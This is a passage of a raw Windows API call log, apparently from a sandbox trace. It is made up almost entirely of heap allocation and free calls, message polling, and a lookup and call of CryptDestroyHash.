hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0238.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0238.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0238.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0238.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0238.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0238.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977de8 | out: hHeap=0x970000) returned 1 [0238.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0238.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0238.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0238.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0238.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0238.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0238.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0238.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0238.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0238.382] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0238.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0238.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0238.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0238.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0238.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0238.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0238.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0238.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0238.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0238.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0238.382] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0238.382] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0238.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0238.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0238.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0238.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0238.383] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0238.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0238.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0238.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0238.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0238.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0238.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0238.383] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0238.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0238.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0238.383] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0238.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0238.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0238.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0238.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0238.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0238.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0238.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511c0 [0238.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51250 [0238.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51190 [0238.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0238.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51178 [0238.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0238.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0238.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51130 [0238.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510a0 [0238.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51268 [0238.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0238.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51058 [0238.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0238.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0238.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511f0 [0238.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0238.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51220 [0238.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51298 [0238.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0238.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510d0 [0238.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fc8 [0238.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0238.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510e8 [0238.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51100 [0238.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0238.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0238.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0238.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0238.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0238.384] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0238.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0238.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0238.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51028 [0238.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0238.385] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0238.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0238.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0238.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0238.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0238.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0238.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0238.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0238.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0238.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0238.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0238.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0238.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0238.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0238.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0238.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0238.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0238.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0238.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0238.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0238.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0238.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0238.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0238.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0238.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0238.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0238.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0238.386] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0238.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0238.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0238.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0238.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0238.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0238.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0238.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0238.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0238.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0238.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0238.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0238.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0238.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0238.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0238.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0238.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0238.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0238.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0238.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0238.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0238.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0238.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69b28 [0238.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69b28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0238.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0238.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0238.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0238.387] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0238.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f800 | out: hHeap=0x970000) returned 1 [0238.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0238.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0238.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0238.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0238.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0238.387] CryptDestroyHash (hHash=0xa87110) returned 1 [0238.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0238.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0238.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0238.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0238.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0238.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0238.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0238.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0238.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0238.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0238.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0238.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0238.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0238.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0238.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0238.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0238.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0238.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0238.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0238.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0238.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0238.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0238.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0238.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0238.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0238.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0238.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0238.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0238.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0238.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0238.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0238.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0238.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0238.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0238.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0238.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0238.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0238.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0238.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0238.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0238.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0238.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0238.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0238.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0238.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0238.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0238.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0238.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0238.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0238.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0238.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0238.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0238.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0238.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0238.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0238.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0238.389] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0238.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0238.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0238.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0238.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0238.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0238.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0238.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0238.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0238.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0238.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0238.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0238.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0238.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0238.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0238.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0238.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0238.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0238.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0238.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b48 | out: hHeap=0x970000) returned 1 [0238.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0238.390] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0238.390] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.390] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.390] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0238.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0238.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0238.390] 